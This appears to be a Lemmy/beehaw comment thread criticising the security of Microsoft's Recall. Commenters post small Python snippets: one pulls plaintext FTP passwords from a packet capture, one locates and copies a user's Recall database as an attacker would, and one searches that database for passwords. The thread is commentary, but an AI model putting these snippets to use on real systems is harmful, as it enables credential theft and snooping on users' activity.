• Ephera
      link
      fedilink
      16
      edit-2
      19 days ago

      Man, during my apprenticeship, I spent a month in the offensive security department, meaning the white-hat hackers. My most memorable experience there was scrolling through a Wireshark log from a server (which a user had conveniently placed into a web-hosted folder, so that our automated scanners could pick it up).

      Then we found an unencrypted FTP connection in there, which meant the password got logged in plain text, and so we tried the same password for SSH. In about 10 minutes, we had root access. On a real-world system.

      And yeah, watching the guy in the video scroll through those Recall logs felt eerily similar. Like you just need the right Ctrl+F, the right screenshot, or any clue that they’re using some insecure technology you can exploit. If you can extract those logs, it’s likely just a matter of time until you find something.
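
      For anyone wondering how little effort that FTP part takes: here’s a minimal sketch of pulling plaintext credentials out of a capture, assuming it’s been saved as capture.pcap and scapy is installed. The filename and filter are just illustrative, not what we actually used.

      ```python
      # Minimal sketch: fish plaintext FTP credentials out of a packet capture.
      # FTP sends USER/PASS commands in clear text on the control channel (port 21).
      from scapy.all import rdpcap, TCP, Raw

      for pkt in rdpcap("capture.pcap"):
          if pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt[TCP].dport == 21:
              line = pkt[Raw].load.decode(errors="replace").strip()
              if line.startswith(("USER", "PASS")):
                  print(line)
      ```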

  • @Moonrise2473
    link
    44
    19 days ago

    AI taking more jobs.

    Now you just need to execute a single PowerShell line to upload the whole history to the attacker; no need to hire skilled hackers to code custom malware or infostealers.

    What are those malware devs going to do now that AI has replaced them?
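
    Something like the sketch below is roughly all it would take. The ukg.db path under LOCALAPPDATA is what security researchers have reported for the preview builds, so treat it as an assumption; a real attacker would upload the copy rather than just dropping it on disk.

    ```python
    # Sketch of the point: no admin rights, no custom infostealer, just a few lines
    # that grab the current user's Recall database. The CoreAIPlatform.00\UKP\...\ukg.db
    # location is the one researchers have reported; it may differ between builds.
    import glob
    import os
    import shutil

    appdata = os.environ.get("LOCALAPPDATA", "")
    pattern = os.path.join(appdata, "CoreAIPlatform.00", "UKP", "*", "ukg.db")

    for db in glob.glob(pattern):
        print("found:", db)
        shutil.copy(db, "stolen_history.db")  # an attacker would exfiltrate this copy
    ```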

  • m-p{3}
    link
    fedilink
    42
    20 days ago

    Please hack the fuck out of it so that it gets canned ASAP.

    • @Zworf@beehaw.org
      link
      fedilink
      20
      edit-2
      19 days ago

      I don’t think it will.

      Microsoft’s endgame is being the lord and master of AI. AI thrives on having more data about the user. What good is an assistant if it doesn’t know your habits, your wishes and desires, your schedule and your attitude towards each person in your life?

      This is not really a feature aimed primarily at helping the user directly (even though it’s currently marketed as such); it’s there to have the AI build up a repository of knowledge about you. Which is hopefully used locally only. For now that seems to be the case, but knowing Microsoft, once they have established themselves as the leading product, they will start monetising it in every way possible.

      Of course I’m very unhappy with this too. I’d like to have an AI assistant, but it has to be FOSS, and owned and operated by me. I don’t trust Microsoft in any way. I’m already playing around with ollama, RAG scripting, etc. It won’t be as good as simply signing up to OpenAI, Google or Microsoft, but at least it will be mine.
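
      For anyone wanting to tinker with the same setup: a minimal sketch of talking to a local ollama instance over its HTTP API. The model name and the default port 11434 are assumptions based on a stock install; adjust them to whatever you’ve pulled.

      ```python
      # Minimal sketch: ask a locally running ollama instance a question.
      # Assumes ollama is listening on its default port (11434) and that a model
      # named "llama3" has already been pulled.
      import json
      import urllib.request

      payload = json.dumps({
          "model": "llama3",
          "prompt": "Summarise my notes from today.",
          "stream": False,
      }).encode()

      req = urllib.request.Request(
          "http://localhost:11434/api/generate",
          data=payload,
          headers={"Content-Type": "application/json"},
      )
      with urllib.request.urlopen(req) as resp:
          print(json.loads(resp.read())["response"])
      ```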

  • @Hirom@beehaw.org
    link
    fedilink
    23
    edit-2
    20 days ago

    Not surprising. If there’s a way for a non-admin user to use this, it means there’s probably a way for a non-admin process to access the data.

    Even if it were more secure, there are probably plenty of ways for attackers to escalate privileges to admin.

    The bigger issue is Microsoft providing an official tool for snooping on user activity. Malware won’t have to install its own, and Recall taking screenshots periodically won’t be considered anomalous behaviour, since it’s an official Microsoft service.

    • @BurningRiver@beehaw.org
      link
      fedilink
      8
      19 days ago

      “Recall taking screenshots periodically”

      Seriously, you didn’t get through the first paragraph?

      “the notion of a tool that silently takes a screenshot of your desktop every five seconds”

      Saying “periodically” is putting it pretty mildly.

      Microsoft and Adobe are fighting each other over who gets the enshittification-of-the-decade award. Sam Altman is probably crafting a victory speech about what ChatGPT 12 might possibly be able to do, someday. The sooner all this snake-oil hype crashes and burns, the better off we’ll all be.

    • @psud@aussie.zone
      link
      fedilink
      7
      19 days ago

      The article describes a tool that grabs the data without admin privileges, but yes, there are methods used by current malware to escalate privileges.

  • @emerald@beehaw.org
    link
    fedilink
    English
    10
    edit-2
    19 days ago

    I recently listened to the Vergecast episode about all of MS’s recent announcements and was genuinely shocked to hear Recall being compared to, more or less, the local caching that already happens while you use your computer (plus the normalized big-tech tracking). My gut reaction was that that’s kind of an insane thing to think, and I’m glad I’m being vindicated on that point.

  • @Pekka@feddit.nl
    link
    fedilink
    8
    19 days ago

    Although this feature sounds helpful, it really looks like they went too far with it. They should probably find another way to sell these Copilot+ PCs if they can’t get this secure enough, and probably keep it disabled for companies…

    I’m surprised they didn’t make sure the part that is supposed to hide sensitive information worked well before letting the first testers get their hands on the feature. All this bad news about the feature doesn’t help convince people to turn it on.

    • @jarfil@beehaw.org
      link
      fedilink
      2
      19 days ago

      How were they supposed to test any of it without releasing it to testers? Recall is an “Insider Preview” feature; it’s nowhere close to final.

      • @Sharp312@lemmy.one
        link
        fedilink
        6
        18 days ago

        From my understanding, Recall stored the screenshots it took unencrypted. At least encrypt the bloody data before releasing it to anyone outside of MS.

        • @Meshuggah333@beehaw.org
          link
          fedilink
          5
          18 days ago

          It doesn’t store screenshots; it stores the text it extracts from the screenshots via OCR in a SQLite database. Still one of the worst ideas these idiots ever had.
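
          Which is exactly why it’s so dangerous: once the OCR’d text sits in a plain SQLite file, “the right Ctrl+F” is literally one query. A rough sketch below; the filename and the table and column names are made up for illustration, since the real schema isn’t documented.

          ```python
          # Illustrative only: searching an unencrypted SQLite dump of OCR'd screen text.
          # The table/column names are hypothetical; the real Recall schema may differ.
          import sqlite3

          conn = sqlite3.connect("ukg.db")
          rows = conn.execute(
              "SELECT captured_at, text FROM captured_text WHERE text LIKE ?",
              ("%password%",),
          )
          for captured_at, text in rows:
              print(captured_at, text)
          conn.close()
          ```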

          • @jarfil@beehaw.org
            link
            fedilink
            3
            18 days ago

            “Insider Preview” features are proof-of-concept stuff; they can add encryption before the “Public Preview” version.

        • @jarfil@beehaw.org
          link
          fedilink
          2
          18 days ago

          “Insider Preview”

          “internal security testing”

          Precisely my point.

          If people don’t want to be part of the internal testing, or part of the QA testing, then they shouldn’t be running “Insider” or “Preview” stuff.

          • Vodulas [they/them]
            link
            fedilink
            2
            18 days ago

            Insiders are not MS employees, though. That is also not the same as trained QA or security. You or I can join the Insider program. It is essentially a public beta.

            • @jarfil@beehaw.org
              link
              fedilink
              2
              18 days ago

              More like alpha. The normal (non-Insider) “Preview” versions are the public beta… then they use a staged update deployment for QA.

              And yes, MS is saving a lot of money on trained employees by using paying customers as testers.

              • Vodulas [they/them]
                link
                fedilink
                1
                18 days ago

                Alpha is for sure more accurate. But for me, that also means big security holes like that should be plugged before Insider. I’m also a bit biased, being a QA engineer.